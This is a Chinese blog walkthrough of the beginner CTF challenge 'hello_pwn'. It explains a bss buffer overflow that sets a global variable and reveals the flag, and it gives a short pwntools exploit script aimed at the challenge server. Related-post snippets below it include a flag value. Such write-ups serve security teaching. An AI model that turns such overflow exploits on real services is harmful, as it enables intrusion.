攻防世界hello pwn WP(pwn入门基础题)

已于 2023-03-31 20:20:32 修改
阅读量2k 收藏 18
点赞数 3
文章标签: 安全
于 2022-11-21 19:53:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62584974/article/details/127970398
版权

题目网址:

攻防世界

下载文件,文件名太长了把文件改名为pwn

把pwn文件放入kali里面

file一下查看文件类型

发现是一个64位的elf文件,加个运行权限,运行一下看看 

使用 checksec 检查保护

发现只开了 NX 保护。

把pwn放入64位IDA中,F5反汇编一下main函数

得到main函数伪代码

__int64 __fastcall main(int a1, char **a2, char **a3)
{
  alarm(0x3Cu);
  setbuf(stdout, 0LL);
  puts("~~ welcome to ctf ~~     ");
  puts("lets get helloworld for bof");
  read(0, &unk_601068, 0x10uLL);
  if ( dword_60106C == 1853186401 )
    sub_400686();
  return 0LL;
}

点击  read(0, &unk_601068, 0x10uLL);处的unk_601068

发现这个要我们输入的变量在bss段处 

bss段:通常是指用来存放程序中未初始化的全局变量和静态变量的一块内存区域。

关键语句是这个 

if ( dword_60106C == 1853186401 )
    sub_400686();

点击sub_400686();发现这个是获取flag的函数

所以说题目就是想要当dword_60106C等于1853186401时,给我们flag

但是让我们输入的的变量名为unk_601068,我们正常输入是不能使dword_60106C等于1853186401的,我们要通过栈溢出,使dword_60106C等于1853186401。

我们从IDA中可以看出dword_60106C在unk_601068的下面,在计算机内存中变量应该是从下往上排列的,但是IDA为了符合我们喜欢向下看的习惯,把变量从上往下排了。我们只需要在输入unk_601068时,输入无关的数据,使得栈的指针指向60106C处,然后在此处输入1853186401。即可完成题目要求

pwnpayload.:

from pwn import *
context(os='linux', arch="amd64", log_level="debug")
os = remote('61.147.171.105',61286)#填写远程连接的ip和端口
os.recvuntil('lets get helloworld for bof\n')#这里是运行程序将要接收到的文字
payload = b'a'*(0x6c-0x68) + p64(1853186401) #a是垃圾信息 p64指的是以64位打包
os.sendline(payload)
os.interactive()

墨言ink
关注
  • 3
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界XCTF-Pwn入门11报告
ailx10
03-15 1495
Pwn是CTF中至关重要的项目,一般来说都是Linux二进制目,零基础的同学可以看《程序员的自我修养》,主要型包括:缓冲区溢出、Return to Libc、格式化字符串、PLT GOT等。攻防世界XCFT刷信息汇总如下:攻防世界XCTF黑客笔记刷记录 ~第一:level0解报告:首先看看这个程序是啥呗,哦64位Linux可执行程序:IDA看看逻辑,输出一个hello world然后就...
pwn学习(1)攻防世界-hello_pwn(大小端存储/ELF文件)
最新发布
m0_66039322的博客
08-25 286
最后结果: cyberpeace{f178d34680e278da75e4b40e9921da97}查看读入数据和比较数据的位置,会发现问,他们是挨着的,且相差4个字节,0000000000601068是开始位置,中间的数据随便填充即可。
攻防世界-hello_pwn
qq_52333044的博客
06-22 245
第一种:通过先输入四给任意字符再输入"aaun" (为什么是aaun呢,因为小端序和大端序的问,小端序低地址存低位,大端序就是低地址存高位,这里采用小端序)unk-601068和dword——60106C相差4 个字节,然后我们可以通过覆盖来改变dwod_60106c的赋值。发现当unk_601068等于nuaa时才能得到flag。习惯性的用ls没有什么用,然后查看是多少位。然后用64位IDA打开查看程序。用kali linux 打开。第二种:就直接写exp。
攻防世界 pwn新手区 wp
Gtooler的博客
10-07 456
get-shell 此是经典入门,没有设置任何漏洞,直接给了shell 直接nc连上,然后ls,最后cat flag即可 hello_pwn 发现只要让dword_60106C == 1853186401就可以拿到flag read函数将把数据读入unk_601068中,要想办法让数据覆盖到dword_60106C,所以查看两个数据内存 计算距离为4,写个exp即可 from pwn import * p = remote('111.200.241.244', '56851') p.recvu
pwn学习入门教程(一)
StevenOnesir的博客
11-24 2863
写这个系列的文章是因为想系统回顾之前学过的ctf知识,也希望引领更多人入门。 1. 对pwn的理解 pwn是ctf的一种型,主要是利用程序中的漏洞造成内存破坏以获取远程计算机的shell,从而获得flag。对面服务器运行的更多是C/C++语言编写的程序,而我们通过网络与服务器进行数据交互,我们可以构造恶意数据发送给服务器,导致服务器执行恶意代码,从而远程控制服务器。 个人感觉逆向工程是pwn基础,两者极其类似。学习pwn的门槛比web高很多,所以更需要长期的钻研与学习。 2、pwn入门学习的几点建议 首
攻防世界-Pwn-new-easypwn
wuh2333的博客
03-12 3787
攻防世界-Pwn-new-easypwn
攻防世界pwn:Recho.doc
07-13
攻防世界pwn:Recho.doc 知识点总结 本文总结了攻防世界pwn:Recho.doc的知识点,涵盖了二进制文件分析、栈溢出、ROP技术、libc泄露、系统调用等多个方面。 1. 二进制文件分析 攻防世界pwn:Recho.doc是一...
一道pwn入门的练习
10-23
直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
攻防世界pwn:forgot.doc
07-13
攻击防御世界pwn:forgot.doc 本文档是关于攻击防御世界pwn的Forgot.doc,涉及到有限状态自动机、正则表达式、电子邮件地址验证、Lua、IDA静态分析、canary和PIE保护机制、scanf函数溢出漏洞、栈溢出攻击、...
warmup pwn入门
02-11
pwn入门
pwn点云文件
07-06
打开是一个怪兽的点云文件,在需要使用pwn文件时方便使用
welpwn pwn 入门
02-11
pwn 入门
攻防世界 pwn
清霂的博客
02-02 641
目录1.get_shell2.when_did_you_born3.hello_pwn4.level05.level26.cgpwn2 1.get_shell nc连接 连接后ls | cat flag 2.when_did_you_born file checksec 有canary保护,不能栈溢出 ida64 先输入v5,v5不能等于1926。再输入v4,注意有gets函数,不限制输入,但无法溢出,点进去v4,v5 发现var_18是v5,var_20是v4,那么可以输入v4时将v5的值覆盖为19
攻防世界pwn——Mary_Morton
qq_62076255的博客
12-19 175
记录
初学pwn-攻防世界(hello_pwn)
天柱的博客
08-26 3440
初学pwn-writeUp 攻防世界的第二道目,hello_pwn。 首先创建场景,使用nc进入远端,发现他只输出了一串字符串,没有别的内容,也无法使用ls查看它的文件。 下载场景提供的文件,使用cat查看,发现是ELF文件,按照大佬的流程,ELF文件直接用ida打开。 初次使用ida,深切的感受到了ida的强大。 打开之后,按F5,进行反编译,可以看到main函数的伪代码 可以从main函数中看到,这里存在一个判断,如果条件达成的话,会调用一个函数。点开函数看一下。 可以发现里边会输出flag.tx
Pwn学习历程(1)--基本工具、交互、调试
热门推荐
Aka丶的博客
12-02 5万+
1、 从基础开始1.1 简单原理介绍以下内容摘自Wiki:   Pwn是一个骇客语法的俚语词,自”own”这个字引申出来的,这个词的含意在于,玩家在整个游戏对战中处在胜利的优势,或是说明竞争对手处在完全惨败的情形下,这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被击败(例如:”You just got pwned!”)。   在骇客行话里,尤其在另外一种电脑技术方面,包
学校的简单入门PWN
EternalBurning的博客
11-09 542
学校的简单入门PWN0x00 first try0x01 easy_second_try0x02 printf 0x00 first try exeinfo打开看一下,是32位的 看看有没有程序保护,估计是入门的缘故都没有程序保护: 用32位的ida打开, 要想拿到shell,就得让v6==99,而第11行的read()明显存在栈溢出,双击变量进入函数的栈界面 容易发现,s字符串的长度...
Pwn环境配置(三)——ubuntu环境搭建
Y_peak的博客
01-29 1664
pwn的环境搭建 PWN 何为pwn,相信能点进来看这篇文章的你或多或少都应该有所了解。百度百科解释,”Pwn”是一个黑客语法的俚语词 ,是指攻破设备或者系统 。发音类似“砰”,对黑客而言,这就是成功实施黑客攻击的声音——砰的一声,被“黑”的电脑或手机就被你操纵了。 话不多说下面我们来看看如何搭建一下打pwn的环境。 pwntools: 常用于交互 IDA: 常用于反汇编 GDB and pwndbg:常用于调试 基本上将这三个搭建好了,就可以解决大部分的pwn了。当然你也可能了解其他一些工具比如p
攻防世界pwn新手答案
08-10
回答: 对于攻防世界pwn新手,其中一个关键是要修改全局变量pwnme的内容。通过格式化字符串的方法,可以实现这个目标。格式化字符串的原理是利用输入的格式化字符串,修改内存中的指定位置的值。具体的方法可以参考CTF-wiki上对格式化字符串的总结。另外,还可以利用栈溢出漏洞来实现攻击。栈溢出漏洞的原理是当输入的数据超过了栈的缓冲区大小时,会覆盖到相邻的内存区域,包括函数返回地址等重要信息。通过溢出覆盖system函数的参数为"/bin/sh",就可以获取到shell权限。在IDA32中,可以通过查看字符串窗口,找到可以直接利用的字符串,比如system和/bin/sh。这样就可以猜测需要溢出覆盖system函数的参数,实现获取shell的目的。123 #### 引用[.reference_title] - *1* *2* [xctf攻防世界pwn基础解(新手食用)](https://blog.csdn.net/lplp9822/article/details/89735167)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *3* [攻防世界 pwn 二进制漏洞简单练习区 答(1-10解)](https://blog.csdn.net/qq_33957603/article/details/122450397)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值